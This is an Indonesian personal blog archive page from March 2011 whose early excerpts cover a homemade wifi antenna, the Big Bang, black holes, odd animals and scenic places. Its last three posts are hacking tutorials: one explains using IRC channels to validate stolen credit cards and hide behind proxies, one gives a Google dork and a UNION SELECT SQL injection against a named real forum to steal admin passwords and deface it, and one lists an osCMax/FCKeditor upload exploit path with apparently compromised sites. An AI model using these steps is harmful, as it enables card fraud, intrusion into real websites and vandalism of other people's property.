Skip to main content

Posts

Showing posts from March, 2011

Membuat Antenna Wireless

UJI COBA MEMBUAT SENDIRI WIRELESS ANTENNA WAJAN BOLIC
DENGAN USB D-LINK DWL-G120


A.) Langkah awal adalah mempersiapkan bahan.
1 buah Wajan penggorengan diameter 36* cm
1 batang Pipa paralon diameter 1” panjang +/- 50* cm
2 buah Tutup pipa paralon paralon diameter 1”
1 buah Klem Antenna
1 buah Besi siku untuk rangka Klem Antenna
2 buah Baut + Sekrup diameter 1 cm
1 buah Kaleng Susu bekas + Tutup Plastik
1 buah USB Wireless D-Link DWL-G120 + USB Cable
1 buah UTP Cable CAT 5E panjang maximum 20 M

B.) Mempersiapkan peralatan tukang.

C.) Melakukan perhitungan berdasarkan teori sebagai berikut:
Untuk mencari jarak Fokus untuk Feeder

f = D^2 / (16*d)
Contoh hasil bisa di lihat di http://my.opera.com/m4m4n/albums/show.dml?id=158489

Semoga Bermanfaat

sumber http://my.opera.com/.

Terbentuknya Jagad Raya

Kadang aku berfikir sebenarnya jagad raya itu terbentuk dari apa dan apa,selama ini pelajaran yang saya dapat merupakan teori yang belum tentu kebenarannya.banyak teori yang menjelaskan tentang terjadinya jagad raya salah satunya yang terkenal adalah teori big bang,Teori ini menyatakan bahwa alam semesta ini terbentuk dari ledakan mahadahsyat yang terjadi sekitar 13.700 juta tahun lalu. Ledakan ini melontarkan materi dalam jumlah sangat besar ke segala penjuru alam semesta.

Materi-materi ini kemudian yang kemudian mengisi alam semesta ini dalam bentuk bintang, planet, debu kosmis, asteroid/meteor, energi, dan partikel lainnya dialam semesta ini.Para ilmuwan juga percaya bawa Big Bang membentuk sistem tata surya. Ide sentral dari teori ini adalah bahwa teori relativitas umum dapat dikombinasikan dengan hasil pemantauan dalam skala besar pada pergerakan galaksi terhadap satu sama lain, dan meramalkan bahwa suatu saat alam semesta akan kembali atau terus. Konsekuensi alami dari Teori Big …

LUBANG HITAM [atau black hole]

Lubang hitam adalah "sesuatu" yang berbentuk seperti sebuah lubang raksasa di alam semesta, ia memiliki diameter raksasa dan terdapat banyak benda-benda angkasa yang tertarik di sekelilingnya. Sebuah lubang hitam memiliki gaya gravitasi yang sangat kuat. Gravitasi dari lubang hitam dapat menarik apapun yang mendekatinya atau melintas dihadapannya. Bahkan cahaya yang memiliki kecepatan lebih dari 300 km / detik dapat tertarik oleh gravitasi dari lubang hitam.

Sebuah lubang hitam yang terbentuk oleh satu atau lebih benda-benda yang menjadi sangat padat, karena itu kepadatan inilah, gravitasi akan menjadi sangat besar dan "mengambil alih" massa benda itu sendiri. kemudian, proses ini membentuk sebuah lubang hitam baru yang akan menarik apapun yang berada di dekatnya.

Karena lubang hitam memiliki gaya gravitasi yang sangat kuat sehingga dapat menarik benda apapun mendekat, lubang hitam mendapatkan sebutan yang mengerikan seperti "kuburan luar angkasa." Banyak b…

Hewan-hewan teraneh di Dunia

Begitu banyak binatang-binatang di dunia ini yang memilki bermacam-macam bentuk dan karakteristik yang berbeda-beda.Bagaimana dengan binatang-binatang yang memilki bentuk yang aneh?mungkin sebagian dari kalian telah dan pernah melihat hewan tersebut atau belum pernah sama sekali oleh karena itu world of mystery akan mengungkap hewan yang paling aneh.

Berikut hewan-hewan paling aneh di dunia tersebut:

Sloth


Sloths adalah mamalia berukuran sedang yang tinggal di Amerika Tengah dan Selatan milik keluarga Megalonychidae dan Bradypodidae, bagian dari tatanan pilosa. Kebanyakan ilmuwan menyebut dua keluarga yang Folivora subordo, sementara beberapa menyebutnya Phyllophaga.

Sloths adalah omnivora. Mereka mungkin makan serangga, kadal kecil dan bangkai, tapi makanan mereka kebanyakan terdiri atas tunas, tunas lembut, dan daun.

Sloths telah membuat adaptasi yang luar biasa untuk sebuah gaya hidup arboreal browsing. Daun, sumber makanan utama mereka, menyediakan sangat sedikit energi atau gizi dan t…

9 Tempat Paling Menakjubkan Di Dunia

Ini mungkin adalah tempat-tempat terindah dan paling spektakuler di dunia yang sangat jarang dilihat sebelumnya. Dari keindahan Antartika, kota-kota diatas awan, pantai-pantai tersembunyi yang spektakuler, dan tempat-tempat lainnya, yang bahkan lebih mengagumkan.

1. Di Suatu Tempat di Puncak Dunia.


Gambar diatas, adalah puncak Himalaya Tibet . Ini adalah titik tertinggi di seluruh Planet Bumi. Dengan foto dan cahaya seperti ini Himalaya tampak seperti sebuah tempat di planet lain.

2. Cahaya Misterius di Utara.


Sinar Aurora Borealis yang "spektakuler" di langit Alaska (ujung utara Amerika, dekat Kutub Utara). Aurora sebenarnya adalah cahaya natural di angkasa yang terjadi akibat tabrakan partikel-partikel medan magnet bumi dengan atom dan molekul dari atas atmosfir bumi. Warnanya yang paling umum ada dua, hijau dan merah dan dapa dilihat pada waktu malam.

3. Benteng Chittogarh, India.



4. Desa Warna-Warni.


Cinque Terre , Riviera , adalah salahsatu tujuan wisata paling populer di Ital…

carding

teknik carder masbro..
Tentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.

Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.

Mari kita mulai......

1.masuk ke MIRC
dari MIRC kalian join ke channel ini :

#CCPOSTS
#THACC (Dulu namanya #thecc)

sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!

2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.

3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.

4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)

5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.

6…

deface forum.

nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini

langsung ya

Ketik di google
inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1
1,12+from+users

Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums ... from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script …

show of

powered by osCMax v.2.0

dork : Powered by osCMax v2.0
FCKeditor/editor/filemanager/browser/default/connectors/test.html
.
om goole.
serch: Powered by osCMax v2.0
kalo dah dapet.
exploit:
FCKeditor/editor/filemanager/browser/default/connectors/test.html
kalo udah,
http://www.kaian.ir//images/File/
http://seifico.com//images/File/
http://www.mahmanco.ir//images/File/
jadi nya gini bg.. 
maaf kalo kurang jelas,
soal nya bahasa saya ancoorr..